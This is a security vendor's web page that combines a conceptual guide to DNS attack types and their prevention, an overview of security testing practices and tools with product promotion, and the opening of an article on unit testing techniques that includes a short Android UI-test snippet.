What Are DNS Attacks and How to Prevent Them

Table of Contents

  1. What Is DNS?
  2. Why Perform an Attack on the DNS?
  3. What Are the 5 Major DNS Attack Types?
  4. DNS Attack Prevention
  5. How DNS Attacks Can Disrupt Business Operations
  6. DNS Attacks vs DDoS: What’s the Difference?
  7. Best Practices for DNS Security Configuration
  8. How to Detect Early Signs of a DNS Attack
  9. See Additional Guides on Key Cybersecurity Topics

What Is a Domain Name Server (DNS) Attack?

DNS is a fundamental internet service: it takes user-entered domain names and matches them to IP addresses. DNS attacks abuse this mechanism to perform malicious activities.

For example, DNS tunneling techniques enable threat actors to compromise network connectivity and gain remote access to a targeted server. Other forms of DNS attacks can enable threat actors to take down servers, steal data, lead users to fraudulent sites, and perform Distributed Denial of Service (DDoS) attacks.

This is part of an extensive series of guides about Cybersecurity.

What Is DNS?

Domain name system (DNS) is a protocol that translates a domain name, such as website.com, into an IP address such as 208.38.05.149.

When users type the domain name website.com into a browser, a DNS resolver (a program in the operating system) searches for the numerical IP address of website.com. Here is how it works:

  • The DNS resolver looks up the IP address in its local cache. 
  • If the DNS resolver does not find the address in the cache, it queries a DNS server. 
  • The recursive nature of DNS servers enables them to query one another to find a DNS server that has the correct IP address or to find an authoritative DNS server that stores the canonical mapping of the domain name to its IP address.
  • Once the resolver finds the IP address, it returns it to the requesting program and also caches the address for future use.
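The caching flow above can be sketched as a stub resolver. This is a minimal illustration, not a real DNS implementation; the upstream record table and the IP address are hypothetical stand-ins for actual DNS servers:

```python
UPSTREAM_RECORDS = {"website.com": "192.0.2.44"}  # hypothetical record

class StubResolver:
    """Minimal stand-in for an OS DNS resolver with a local cache."""

    def __init__(self):
        self.cache = {}             # local cache, checked first
        self.upstream_queries = 0   # how often we had to ask a server

    def query_upstream(self, domain):
        # Stands in for recursively querying DNS servers until an
        # authoritative answer is found.
        self.upstream_queries += 1
        return UPSTREAM_RECORDS[domain]

    def resolve(self, domain):
        if domain in self.cache:           # 1. look in the local cache
            return self.cache[domain]
        ip = self.query_upstream(domain)   # 2-3. query DNS servers
        self.cache[domain] = ip            # 4. cache for future use
        return ip

resolver = StubResolver()
resolver.resolve("website.com")    # first lookup goes upstream
resolver.resolve("website.com")    # second lookup is served from cache
print(resolver.upstream_queries)   # 1
```

The cached answer is what makes DNS fast, and also what cache-poisoning attacks (covered below) target.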

Why Perform an Attack on the DNS?

DNS is a fundamental service of the IP network and the internet. This means DNS is required during most exchanges. Communication generally begins with a DNS resolution. If the resolution service becomes unavailable, the majority of applications can no longer function. 

Attackers often try to deny the DNS service by bypassing the protocol's standard functions, or by using bug exploits and flaws. DNS traffic is also typically allowed through security tools with limited verification of the protocol or its usage. This can open doors to tunneling, data exfiltration, and other exploits that employ covert communications.

What Are the 5 Major DNS Attack Types?

Here are some of the techniques used for DNS attacks.

1. DNS Tunneling

DNS tunneling involves encoding the data of other programs or protocols within DNS queries and responses. The encoded payloads give attackers a covert command-and-control channel, allowing them to manage a compromised remote server and its applications.

DNS tunneling often relies on the external network connectivity of a compromised system, which provides a way into an internal DNS server with network access. It also requires controlling a server and a domain, which functions as an authoritative server that carries out data payload executable programs as well as server-side tunneling. 
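To make the encoding concrete, here is a minimal sketch of how data can be smuggled inside query names: the payload is base32-encoded (DNS names allow only a restricted character set), split into labels of at most 63 bytes, and appended to an attacker-controlled domain. The domain name is hypothetical:

```python
import base64

TUNNEL_DOMAIN = "attacker-tunnel.example"  # hypothetical attacker domain

def encode_as_query(payload: bytes, domain: str = TUNNEL_DOMAIN) -> str:
    # Base32 survives DNS's case-insensitive, limited character set.
    encoded = base64.b32encode(payload).decode().rstrip("=").lower()
    # DNS labels are limited to 63 bytes each.
    labels = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]
    return ".".join(labels + [domain])

def decode_from_query(qname: str, domain: str = TUNNEL_DOMAIN) -> bytes:
    data = qname[: -(len(domain) + 1)].replace(".", "").upper()
    data += "=" * (-len(data) % 8)  # restore base32 padding
    return base64.b32decode(data)

query = encode_as_query(b"secret data")
print(query)                       # looks like an ordinary subdomain lookup
print(decode_from_query(query))    # b'secret data'
```

The attacker's authoritative server for that domain receives every such "lookup" and decodes the payload, which is why tunneling blends into normal DNS traffic so well.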

Related content: Read our guide to DNS tunneling

2. DNS Amplification

DNS amplification attacks perform Distributed Denial of Service (DDoS) on a targeted server. This involves exploiting open DNS servers that are publicly available, in order to overwhelm a target with DNS response traffic. 

Typically, an attack starts with the threat actor sending a DNS lookup request to an open DNS server, spoofing the source address to be the victim's address. When the DNS server returns its (much larger) DNS record response, it is delivered to the victim rather than the attacker, amplifying the volume of traffic directed at the target.
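The amplification effect is simple arithmetic: a small spoofed request elicits a much larger response aimed at the victim. The byte sizes below are illustrative, not measured values:

```python
# Back-of-the-envelope amplification math (illustrative sizes).
request_bytes = 60      # a small spoofed DNS query
response_bytes = 3000   # e.g. a large response enabled by EDNS0

amplification_factor = response_bytes / request_bytes
print(amplification_factor)  # 50.0 -- each attacker byte becomes 50 at the victim
```

This is why open resolvers are so attractive for DDoS: the attacker's bandwidth is multiplied by the amplification factor before it ever reaches the target.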

Learn more in our detailed guide to DNS amplification attacks

3. DNS Flood Attack

DNS flood attacks involve using the DNS protocol to carry out a user datagram protocol (UDP) flood. Threat actors send valid (but spoofed) DNS request packets at an extremely high packet rate, drawn from a massive pool of spoofed source IP addresses.

Since the requests look valid, the target's DNS servers respond to all of them and can become overwhelmed by the massive volume. A DNS flood consumes a great amount of network resources, exhausting the targeted DNS infrastructure until it is taken offline. As a result, the target's internet access also goes down.

4. DNS Spoofing

DNS spoofing, or DNS cache poisoning, involves using altered DNS records to redirect online traffic to a fraudulent site that impersonates the intended destination. Once users reach the fraudulent destination, they are prompted to log in to their account.

Once they enter the information, they essentially give the threat actor the opportunity to steal access credentials as well as any sensitive information typed into the fraudulent login form. Additionally, these malicious websites are often used to install viruses or worms on end users’ computers, providing the threat actor with long-term access to the machine and any data it stores.

Learn more in our detailed guide to DNS flood attacks

5. NXDOMAIN Attack

A DNS NXDOMAIN flood DDoS attack attempts to overwhelm the DNS server with a large volume of requests for invalid or non-existent records. These requests are often handled by a DNS proxy server, which uses up most (or all) of its resources querying the DNS authoritative server. This causes both the authoritative server and the proxy server to spend all their time handling bad requests, so the response time for legitimate requests slows down until it eventually stops altogether.

DNS Attack Prevention

Here are several ways that can help you protect your organization against DNS attacks:

Keep DNS Resolver Private and Protected

Restrict DNS resolver usage to only users on the network and never leave it open to external users. This can prevent its cache from being poisoned by external actors. 

Configure Your DNS Against Cache Poisoning

Configure security into your DNS software in order to protect your organization against cache poisoning. You can add variability to outgoing requests in order to make it difficult for threat actors to slip in a bogus response and get it accepted. Try randomizing the query ID, for example, or use a random source port instead of UDP port 53.
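To see why randomization helps, here is a sketch of building a DNS query with a random 16-bit transaction ID. An off-path attacker must guess a matching ID (and source port) for a bogus response to be accepted; randomizing both makes that guess far harder. The packet layout follows the standard DNS wire format, and no packet is actually sent:

```python
import random
import struct

def build_dns_query(domain: str) -> tuple[int, bytes]:
    # Random transaction ID drawn from the full 16-bit range.
    txid = random.randrange(0, 1 << 16)
    flags, qdcount = 0x0100, 1  # standard query, recursion desired
    header = struct.pack("!HHHHHH", txid, flags, qdcount, 0, 0, 0)
    # Encode the name as length-prefixed labels, e.g. \x07website\x03com\x00.
    qname = b"".join(bytes([len(p)]) + p.encode() for p in domain.split(".")) + b"\x00"
    question = qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    return txid, header + question

txid, packet = build_dns_query("website.com")
# A resolver would send `packet` from a randomized source port, e.g.:
#   sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   sock.bind(("", 0))  # port 0 -> the OS picks an ephemeral (random) port
# and accept only responses whose transaction ID matches `txid`.
```

With a fixed ID or port, an attacker needs only one lucky packet; with both randomized, the search space grows to billions of combinations per query.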

Securely Manage Your DNS servers

Authoritative servers can be hosted in-house, by a service provider, or through the help of a domain registrar. If you have the required skills and expertise for in-house hosting, you can have full control. If you do not have the required skills and scale, you might benefit from outsourcing this aspect. 

Test Your Web Applications and APIs for DNS Vulnerabilities

Bright automatically scans your apps and APIs for hundreds of vulnerabilities, including DNS security issues.

The generated reports are false-positive free, as Bright validates every finding before reporting it to you. The reports come with clear remediation guidelines for your team. Thanks to Bright’s integration with ticketing tools like JIRA, it is easy to assign issues directly to your developers, for rapid remediation.

How DNS Attacks Can Disrupt Business Operations

DNS issues rarely announce themselves clearly. They usually start with vague complaints – someone says the app feels slow, another says the site won’t load, and support tickets begin to trickle in. By the time teams realize DNS is involved, users are already impacted.

When DNS fails, it doesn’t just affect one service. Everything that depends on name resolution starts breaking at once – websites, APIs, login flows, email delivery, even internal tooling. From the outside, it looks like the entire system is down, even if the underlying infrastructure is perfectly fine.

That’s what makes DNS attacks so disruptive for businesses. Engineering teams may be chasing application bugs while traffic never even reaches the servers. Meanwhile, customers lose trust quickly. For revenue-facing systems, even short DNS disruptions can translate directly into lost transactions and reputational damage.

DNS Attacks vs DDoS: What’s the Difference?

DNS attacks are often described as a type of DDoS, but in practice, they behave very differently. A classic DDoS attack is about volume – overwhelm a service until it can’t respond anymore. You see traffic spikes, CPU usage jumps, and dashboards light up.

DNS attacks don’t always look like that. Instead of hitting the application, attackers interfere with how users find it in the first place. That might mean poisoning records, abusing resolvers, or overwhelming authoritative DNS servers. The traffic levels may not look extreme, but the effect is the same: users can’t reach the application.

The tricky part is visibility. DDoS problems are noisy and obvious. DNS problems are quiet. Requests just fail or go somewhere unexpected. Without DNS-specific monitoring, teams often waste time debugging the wrong layer before realizing that resolution is the real issue.

Best Practices for DNS Security Configuration

Most DNS problems aren’t caused by sophisticated attackers. They’re caused by assumptions. DNS is often treated as background infrastructure – set it up once and move on. Years later, that configuration is still running while the environment around it has changed completely.

Using a reliable DNS provider with redundancy and built-in protection is usually the first practical step. Running your own DNS can work, but only if you’re prepared to maintain it like any other critical system.

Access control is another common weak spot. DNS records are powerful, yet they’re sometimes editable by too many people or automated processes without safeguards. A single mistake or compromised credential can redirect traffic just as effectively as an external attack.

DNSSEC helps in certain scenarios, especially for public domains, but it’s not a silver bullet. What matters more is treating DNS as production infrastructure – monitored, reviewed, and protected – not something that only gets attention when it breaks.

How to Detect Early Signs of a DNS Attack

DNS attacks are hardest to deal with when you notice them late. Once users start reporting outages, you’re already in response mode. Early detection comes down to watching for subtle changes that usually get ignored.

Resolution failures that spike suddenly, odd increases in NXDOMAIN responses, or DNS lookups that start taking longer than usual are often early signals. On their own, they don’t always look alarming, which is why they get missed.

Another warning sign is inconsistency. If users in one region can access a service while others can’t, DNS should be one of the first things checked. These partial failures are common during DNS-based attacks.

Teams that log and review DNS behavior regularly have a big advantage here. When you know what “normal” looks like, it’s much easier to spot when something starts drifting – and react before it turns into a full outage.
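The baseline idea above can be sketched as a simple monitor that tracks the NXDOMAIN ratio over a sliding window and flags drift well above "normal". The window size, baseline ratio, and tolerance factor here are illustrative, not recommended production values:

```python
from collections import deque

class NXDomainMonitor:
    def __init__(self, window=1000, baseline_ratio=0.02, factor=5.0):
        self.responses = deque(maxlen=window)  # recent response codes
        self.baseline_ratio = baseline_ratio   # learned from normal traffic
        self.factor = factor                   # how much drift to tolerate

    def record(self, rcode: str) -> bool:
        """Record one response; return True if the window looks anomalous."""
        self.responses.append(rcode)
        ratio = self.responses.count("NXDOMAIN") / len(self.responses)
        return ratio > self.baseline_ratio * self.factor

mon = NXDomainMonitor(window=100)
# Simulate traffic where a third of responses are NXDOMAIN -- far above
# the 2% baseline, so the monitor should raise alerts.
alerts = [mon.record("NXDOMAIN" if i % 3 == 0 else "NOERROR") for i in range(100)]
print(any(alerts))  # True
```

Real deployments would feed this from DNS server logs or packet captures and compute the baseline from historical traffic rather than hardcoding it.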

See Additional Guides on Key Cybersecurity Topics

Together with our content partners, we have authored in-depth guides on several other topics that can also be useful as you explore the world of cybersecurity.

Device42

Authored by Faddom

Disaster Recovery

Authored by Cloudian

Deserialization

Authored by Bright Security

Security Testing: 7 Things You Should Test, Tools and Best Practices

Table of Content

  1. What Is Security Testing? 
  2. 7 Criteria to Test for in Security Testing
  3. Common Types of Security Testing Tools
  4. Best Practices for Effective Security Testing
  5. Why Security Testing Is Essential for Risk Reduction
  6. How Security Testing Fits into DevSecOps Workflows
  7. Key Metrics to Evaluate Security Testing Effectiveness
  8. Differences Between Security Testing and Vulnerability Assessment
  9. Security Testing with Bright Security

What Is Security Testing? 

Security testing involves evaluating a computing system’s security features to ensure they function properly and protect the application’s users and data. It typically involves checking for vulnerabilities, identifying risks, and assessing other aspects of security. The goal of the process is to discover potential security breaches, misconfigurations, and malicious code that could compromise the system. Security testing methods include penetration testing, vulnerability scanning, and code reviews.

Conducting security tests is crucial to secure computing systems and applications against both internal and external threats. It shifts the focus from just delivering functional software or IT services to delivering secure, functional systems. By incorporating these tests during the development and delivery lifecycle, teams can rectify vulnerabilities early, reducing potential damage and costs associated with post-deployment fixes.

Key benefits of security testing include:

  • Sensitive data protection: Security testing identifies and mitigates vulnerabilities that could lead to data breaches. Sensitive information such as personal details, financial data, and intellectual property must be safeguarded to prevent unauthorized access, data leaks, and other security incidents.
  • Improves stakeholder trust: When customers and other stakeholders know their data is protected, they are more likely to trust and engage with a company’s products and services. Conversely, security breaches can severely damage a company’s reputation, customer trust, and financial standing.
  • Supports compliance efforts: Regulations and industry standards like GDPR, HIPAA, and PCI DSS require organizations to adhere to strict security standards. Security testing helps in ensuring that the application meets these legal and regulatory requirements, avoiding costly fines and penalties for non-compliance.

7 Criteria to Test for in Security Testing

1. Confidentiality

Confidentiality in security testing ensures that sensitive data is accessed only by authorized users. Security measures such as encryption, authentication, and access controls help maintain this confidentiality. Regular testing verifies that these measures are effective, thereby preventing unauthorized access to confidential information.

2. Integrity

Integrity in security testing guarantees that the data remains unaltered and accurate, safeguarding it from unauthorized modifications. Hash functions, checksums, and digital signatures are techniques used to ensure data integrity. Testing these methods ensures that only authorized alterations can be made and all data remains trustworthy.
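As a small illustration of the hash-based approach, an integrity check can store a SHA-256 digest alongside the data and verify it before trusting the content. The record contents here are hypothetical:

```python
import hashlib

def digest(data: bytes) -> str:
    # SHA-256 digest used as an integrity fingerprint for the data.
    return hashlib.sha256(data).hexdigest()

original = b"amount=100;recipient=alice"   # hypothetical record
stored_digest = digest(original)

# Unmodified data verifies against the stored digest...
print(digest(original) == stored_digest)   # True
# ...while any unauthorized alteration changes the digest.
tampered = b"amount=900;recipient=mallory"
print(digest(tampered) == stored_digest)   # False
```

An integrity test would exercise exactly this property: tamper with the data and assert that verification fails.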

3. Authentication

Authentication verifies the identity of users accessing the system, ensuring only authorized individuals gain access. Various techniques such as passwords, biometric scans, and multi-factor authentication are employed. Security testing evaluates the effectiveness of these authentication mechanisms to guard against unauthorized access.

4. Authorization

Authorization determines what resources and data an authenticated user can access. Role-based access control (RBAC) and attribute-based access control (ABAC) are common methods. Security testing verifies that these authorization policies are correctly implemented and enforced, thereby safeguarding sensitive information and resources.
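A minimal RBAC sketch shows what an authorization test verifies: each role can reach only the resources its policy grants. The roles and permissions below are hypothetical:

```python
# Hypothetical role-to-permission policy.
ROLE_PERMISSIONS = {
    "admin":  {"read", "write", "delete"},
    "editor": {"read", "write"},
    "viewer": {"read"},
}

def is_authorized(role: str, action: str) -> bool:
    # Unknown roles get no permissions at all (deny by default).
    return action in ROLE_PERMISSIONS.get(role, set())

print(is_authorized("viewer", "read"))    # True
print(is_authorized("viewer", "delete"))  # False
print(is_authorized("intruder", "read"))  # False
```

Authorization tests typically iterate every (role, action) pair and assert the expected allow/deny outcome, which catches policy regressions early.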

5. Availability

Availability ensures that systems and applications are accessible and functional when needed. This involves testing for potential downtime, assessing resilience against attacks such as distributed denial of service (DDoS), and ensuring redundant systems are in place. Security testing also checks for quick recovery mechanisms to restore services promptly after an incident.

6. Non-Repudiation

Non-repudiation in security testing ensures that actions and transactions can be traced back to their origin. Techniques such as digital signatures and audit logs help maintain this non-repudiation. Regular security testing checks these traces for authenticity and ensures that they have not been tampered with.
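As one sketch of tamper-evident audit logging, each entry can carry a MAC that verification checks later. Note the simplification: a shared-key HMAC only proves a key holder wrote the entry; true non-repudiation needs per-user asymmetric signatures. The key and log entry are hypothetical:

```python
import hashlib
import hmac

SECRET_KEY = b"demo-key-not-for-production"  # hypothetical shared key

def sign_entry(entry: str) -> str:
    return hmac.new(SECRET_KEY, entry.encode(), hashlib.sha256).hexdigest()

def verify_entry(entry: str, tag: str) -> bool:
    # compare_digest avoids timing side channels during verification.
    return hmac.compare_digest(sign_entry(entry), tag)

entry = "2024-05-01T12:00:00Z user=alice action=delete record=42"
tag = sign_entry(entry)
print(verify_entry(entry, tag))                          # True
print(verify_entry(entry.replace("alice", "bob"), tag))  # False
```

A non-repudiation test would deliberately alter logged entries and assert that verification fails, proving the trail cannot be silently rewritten.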

7. Resilience

Resilience in security testing refers to the system’s ability to withstand and recover from security incidents. This includes testing incident response plans, backup systems, and recovery processes. Regular resilience testing ensures that the organization’s response to incidents is swift and effective, minimizing damage and downtime.

Common Types of Security Testing Tools 

SAST (Static Application Security Testing)

Static application security testing (SAST) analyzes source code for vulnerabilities without executing the application. It identifies coding errors that could lead to security breaches. This method enables developers to detect and fix issues early in the development lifecycle, which reduces the cost and complexity of resolving these vulnerabilities later.

SAST tools integrate with development environments, providing real-time feedback. They help enforce secure coding practices consistently, leading to more secure applications. Regular use of SAST tools ensures that code remains secure from the outset, enhancing overall application security.

DAST (Dynamic Application Security Testing)

Dynamic application security testing (DAST) evaluates applications in their running state. Unlike SAST, DAST tests for security flaws while the application is operational. This method mimics the actions of an attacker to uncover vulnerabilities like SQL injection, cross-site scripting, and other runtime issues.

DAST tools do not require access to the source code, making them suitable for testing web services and APIs. Continuous DAST testing helps identify and mitigate security flaws in real-time, reducing the risk of exploitation in live environments.

IAST (Interactive Application Security Testing)

Interactive application security testing (IAST) combines SAST and DAST methodologies to provide a more comprehensive security analysis. IAST tools work inside the application, analyzing and continuously monitoring the code flow and interactions. This method offers detailed insights into where vulnerabilities occur and allows for immediate remediation.

IAST is particularly effective in finding complex vulnerabilities that static and dynamic tests may miss. By combining both methodologies, IAST provides a more accurate assessment of the application’s security posture, enabling more targeted and effective mitigation strategies.

SCA (Software Composition Analysis)

Software composition analysis (SCA) identifies vulnerabilities in third-party components and open-source libraries integrated into an application. SCA tools scan the application’s dependencies and notify developers about known vulnerabilities, license compliance issues, and outdated components.

By using SCA tools, organizations can proactively manage the security and legal risks associated with using third-party software. Regular scans help ensure that all components are up-to-date and compliant, significantly reducing the threat landscape.

MAST (Mobile Application Security Testing)

Mobile application security testing (MAST) focuses on identifying vulnerabilities in mobile applications. MAST tools test for platform-specific vulnerabilities, insecure data storage, improper session handling, and other mobile-specific security issues. Both static and dynamic analysis methods are used to ensure comprehensive testing.

Ensuring mobile application security is crucial, given the increasing use of mobile devices for sensitive transactions. MAST helps organizations protect user data and maintain trust by providing a secure mobile app environment.

RASP (Runtime Application Self-Protection)

Runtime application self-protection (RASP) monitors and protects applications in real-time by embedding security controls within the application during runtime. It can identify and mitigate attacks instantly, providing continuous protection without the need for external intervention.

RASP enhances the security posture by adapting to new threats and vulnerabilities dynamically. It offers immediate defense mechanisms, making applications resilient against attacks and reducing the response time to security incidents.

Best Practices for Effective Security Testing 

Shift Security Testing Left

Shifting security testing left involves integrating security practices early in the software development lifecycle (SDLC). By embedding security testing from the initial phases of design and coding, developers can identify and resolve vulnerabilities before they become critical issues. This proactive approach reduces the likelihood of security flaws making it to production, thereby minimizing the cost and effort required for post-deployment fixes.

Adopting a shift-left strategy encourages a security-first mindset among development teams. Tools like static application security testing (SAST) can be used during coding to catch vulnerabilities in real-time. Continuous integration and delivery (CI/CD) pipelines can include automated security checks, ensuring that each code change is verified for security compliance before merging. This integration leads to more secure software and fosters a culture of security awareness throughout the development process.

Conduct Comprehensive Testing Throughout Development

Conducting security tests at various stages of the SDLC is essential for uncovering different types of vulnerabilities. This includes static testing during development, dynamic testing during staging, and interactive testing in pre-production environments. Combining these approaches ensures that the application is scrutinized from multiple angles, improving the overall security posture.

Developers should employ tools like dynamic application security testing (DAST) to simulate attacks on running applications. Additionally, manual penetration testing by security experts can uncover complex vulnerabilities that automated tools might miss. Regular and thorough testing helps in identifying and mitigating risks promptly, ensuring that security is continuously validated throughout the development process.

Perform Comprehensive Risk Assessments

Comprehensive risk assessments involve evaluating the potential threats and vulnerabilities within an application and their potential impact. By understanding the risk landscape, organizations can prioritize their security efforts effectively, focusing on the most critical areas that could cause significant damage if exploited.

Risk assessments should be conducted periodically and include threat modeling, vulnerability scanning, and impact analysis. These assessments help in identifying the likelihood of various threats and their potential consequences, enabling the development of targeted mitigation strategies. A thorough risk assessment provides a clear understanding of the security posture, guiding the allocation of resources to areas that need the most attention.

Monitor and Analyze Security Metrics

Monitoring and analyzing security metrics is crucial for understanding the effectiveness of security measures and identifying areas for improvement. Key metrics such as the number of vulnerabilities detected, time to resolve security issues, and the frequency of security incidents provide valuable insights into the application’s security health.

Organizations should implement continuous monitoring tools to track these metrics in real-time. Analyzing trends over time helps in identifying patterns, understanding the root causes of recurring issues, and measuring the impact of security initiatives. Regularly reviewing and acting on these metrics ensures that security practices evolve to address emerging threats and vulnerabilities effectively.

Collaborating with Security Experts

Collaboration between developers, IT operations staff, and security experts, a paradigm known as DevSecOps, brings specialized knowledge and skills to the development process, enhancing the overall security of the application. Security experts can provide valuable insights into potential vulnerabilities, best practices, and the latest threat landscape, ensuring that the development team is well-informed and prepared.

Regular engagement with security professionals through code reviews, penetration testing, and security training sessions helps in building a robust security framework. This collaboration ensures that security is not just an afterthought but an integral part of the development process, leading to more secure and resilient applications.

Regularly Updating and Maintaining Security Measures

Regular updates and maintenance of security measures are essential to protect against evolving threats. Security is a dynamic field, with new vulnerabilities and attack vectors emerging constantly. Keeping security tools, libraries, and protocols up-to-date is crucial for maintaining a robust defense against these threats.

Organizations should establish a routine schedule for updating software dependencies, applying security patches, and revisiting security policies. Continuous education and training for development teams on the latest security practices and threat intelligence ensure that they are equipped to handle new challenges. Regular maintenance and updates reinforce the security posture, making the application resilient to both known and emerging threats.

Why Security Testing Is Essential for Risk Reduction

Most security problems don’t start with a big exploit. They start with something small that no one paid attention to. A feature behaves slightly differently than expected. An edge case slips through. An assumption turns out to be wrong. Security testing exists to catch those moments before they turn into incidents.

Teams often think risk comes from “bad code,” but that’s rarely the full story. Risk comes from how systems behave once they’re running. Once users interact with an application, once APIs are chained together, once permissions overlap, things don’t always behave the way the original design intended. Security testing forces teams to look at that reality instead of the plan.

When testing is done properly, it changes how teams think about risk. Instead of guessing which issues matter, they can see which ones are actually reachable and exploitable. That shift alone reduces risk more than chasing long lists of theoretical problems that never show up in practice.

How Security Testing Fits into DevSecOps Workflows

In a DevSecOps setup, security testing works best when it feels boring. Not because it’s unimportant, but because it runs quietly in the background without disrupting delivery. The moment security testing becomes a blocker or a surprise at the end of a sprint, teams start working around it.

Modern workflows move too fast for manual reviews and one-off scans. Security testing has to run alongside builds, deployments, and updates, using the same pipelines developers already rely on. When a change introduces a real issue, the feedback should show up close to that change, not weeks later when context is lost.

The goal isn’t to slow developers down or force them to learn security theory. It’s to surface real problems at the right moment, with enough context that fixing them feels straightforward. When security testing fits naturally into DevSecOps, it stops being “security’s job” and becomes part of how software gets shipped.

Key Metrics to Evaluate Security Testing Effectiveness

If the main success metric for security testing is “number of findings,” something is wrong. High numbers usually mean noise, not protection. The more useful question is whether the testing helps teams make better decisions.

One practical signal is how often findings turn into real fixes. If developers regularly look at results and say, “Yes, this makes sense,” the testing is doing its job. Another signal is time. When testing is effective, issues don’t bounce back and forth between teams. They get fixed without long debates about severity or relevance.

False positives matter more than most teams admit. Every wasted investigation makes the next alert easier to ignore. Over time, good security testing earns trust by being accurate, consistent, and grounded in observable behavior. That trust is what actually makes testing effective.

Differences Between Security Testing and Vulnerability Assessment

Vulnerability assessments and security testing are often treated as the same thing, but they answer different questions. A vulnerability assessment is about coverage. It tells you what might be wrong based on known patterns, configurations, or signatures.

Security testing is about behavior. It asks whether those issues can actually be triggered, abused, or chained together in a real environment. Many findings from assessments never turn into real risk, especially in complex applications where context matters.

Both approaches have value, but they solve different problems. Assessments help teams understand their exposure at a high level. Security testing helps them understand the impact. When teams rely on only one, they either drown in noise or miss issues that only show up at runtime.

Security Testing with Bright Security

Bright Security helps address the shortage of security personnel, enabling AppSec teams to provide governance for security testing, and enabling every developer to run their own security tests. 

Bright empowers developers to incorporate automated Dynamic Application Security Testing (DAST) into their unit testing process earlier than ever before, so they can resolve security concerns as part of their agile development process. Bright’s DAST platform integrates into the SDLC fully and seamlessly:

  • Test results are provided to the CISO and the security team, providing complete visibility into vulnerabilities found and remediated
  • Tickets are automatically opened for developers in their bug tracking system so they can be fixed quickly
  • Every security finding is automatically validated, removing false positives and the need for manual validation

Bright Security can scan any target, whether Web Apps or APIs (REST/GraphQL), to help enhance DevSecOps and achieve regulatory compliance with our real-time, false-positive-free, actionable vulnerability reports. In addition, our ML-based DAST solution provides an automated way to identify Business Logic Vulnerabilities. Learn more about Bright Security testing solutions.

4 Unit Testing Examples: Android, Angular, Node, and React

What Is Unit Testing?

Unit tests are automated tests created by developers to verify that individual components of an application, known as units, are error-free and behave as expected. 

Unit testing is an excellent first step for testing a complex application—developers create unit tests for the smallest testable units, and verify that they are working in isolation. Then they can add integration and acceptance tests to verify that these units are working well together and satisfying user requirements.

A unit can be a function, a procedure, an object, or an entire module. When building unit tests for object-oriented programming (OOP), the unit of testing is typically a complete interface, such as a class or a single method. 
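A minimal example, using Python's built-in unittest module, of a unit test exercising a single function in isolation (the function and its rules are hypothetical):

```python
import unittest

def apply_discount(price: float, percent: float) -> float:
    """The unit under test: a single, isolated function."""
    if not 0 <= percent <= 100:
        raise ValueError("percent must be between 0 and 100")
    return round(price * (1 - percent / 100), 2)

class TestApplyDiscount(unittest.TestCase):
    def test_typical_discount(self):
        self.assertEqual(apply_discount(200.0, 10), 180.0)

    def test_invalid_percent_rejected(self):
        with self.assertRaises(ValueError):
            apply_discount(200.0, 150)

# Run with: python -m unittest <this_file>
```

Each test checks one behavior of one unit, with no dependencies on other components, which is what makes failures easy to localize.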


Unit Testing Techniques

Structural Unit Testing

Structural testing is a white box technique in which a developer designs test cases based on the internal structure of the code. The approach requires identifying all possible paths through the code. The tester selects test case inputs, executes them, and determines the appropriate output.

Primary structural testing techniques include:

  • Statement, branch, and path testing—each statement, branch, or path in a program is executed by a test at least once. Statement testing is the most granular option.
  • Conditional testing—allows a developer to selectively determine the path executed by a test, by executing code based on value comparisons.
  • Expression testing—tests the application against different values of a regular expression.
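As a minimal sketch of branch testing, assuming a hypothetical `classify()` function with one conditional, two inputs are enough to execute both paths at least once:

```javascript
// Hypothetical function with a single conditional branch.
function classify(n) {
  if (n < 0) return "negative"; // branch A
  return "non-negative";        // branch B
}

// Branch testing: at least one test input per branch, so every path runs.
const caseA = classify(-5); // exercises branch A
const caseB = classify(3);  // exercises branch B
```

Statement and path testing follow the same idea, but count executed statements or complete paths rather than branches.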

Functional Unit Testing

Functional unit testing is a black box testing technique for testing the functionality of an application component. 

Main functional techniques include:

  • Input domain testing—tests the size and type of input objects and compares objects to equivalence classes.
  • Boundary value analysis—tests are designed to check whether software correctly responds to inputs that go beyond boundary values.
  • Syntax checking—tests that check whether the software correctly interprets input syntax.
  • Equivalent partitioning—a software testing technique that divides the input data of a software unit into data partitions, applying test cases to each partition.
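Boundary value analysis can be sketched with a hypothetical `validAge()` validator (the 18–65 range is an assumption), testing values that sit exactly on and just beyond each boundary:

```javascript
// Hypothetical validator: accepts integer ages 18 through 65 inclusive.
function validAge(age) {
  return Number.isInteger(age) && age >= 18 && age <= 65;
}

// Boundary value analysis: probe just below, on, and just above each boundary.
const results = [17, 18, 19, 64, 65, 66].map(validAge);
// Expected pattern: [false, true, true, true, true, false]
```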

Error-based Techniques

Error-based unit tests should preferably be built by the developers who originally designed the code. Techniques include:

  • Fault seeding—putting known bugs into the code and testing until they are found.
  • Mutation testing—changing certain statements in the source code to see if the test code can detect errors. Mutation tests are expensive to run, especially in very large applications.
  • Historical test data—uses historical information from previous test case executions to calculate the priority of each test case.
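Fault seeding and mutation testing can be illustrated with a deliberately mutated copy of a function (the `add()` function is a made-up example); a good test "kills" the mutant by failing on it while passing on the original:

```javascript
function add(a, b) { return a + b; }        // original
function addMutant(a, b) { return a - b; }  // seeded fault: "+" mutated to "-"

// The same test passes on the original and fails on the mutant.
const testPasses = (fn) => fn(2, 3) === 5;
const originalOk = testPasses(add);          // true
const mutantKilled = !testPasses(addMutant); // true: the fault was detected
```

If a mutant survives (no test fails), that is a signal the test suite has a coverage gap.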

Unit Testing Examples

Here are some examples of unit tests in different frameworks and platforms.

Unit Tests in Android

You can perform instrumented or local unit tests on Android. Instrumented tests build and install the app alongside a testing app; these are typically UI tests that launch and interact with the app on a device or emulator. Local tests are typically small and focused, running on the host machine (e.g., your development machine) rather than on a device. 

You can build an instrumented test that interacts with the UI on an Android device. For example, you can use a code snippet to click on a “Start” element and verify that it triggers a welcome message element:

// When the Start button is clicked
onView(withText("Start"))
    .perform(click())

// Then the Hello message appears 
onView(withText("Hello"))
    .check(matches(isDisplayed()))

Related content: Read our guide to unit testing in Android (coming soon)

Unit Tests in Angular

Angular unit tests can uncover various issues, including logic flaws and malfunctions, by isolating code snippets. Angular helps you write code to test an application’s functions in isolation. Angular’s main testing utility package is TestBed (the other is async).

You can perform a unit test by running the “beforeEach” block and then running a sequence of other blocks such as “it” or “xit” blocks. The other blocks must follow the “beforeEach” block but are otherwise independent. 

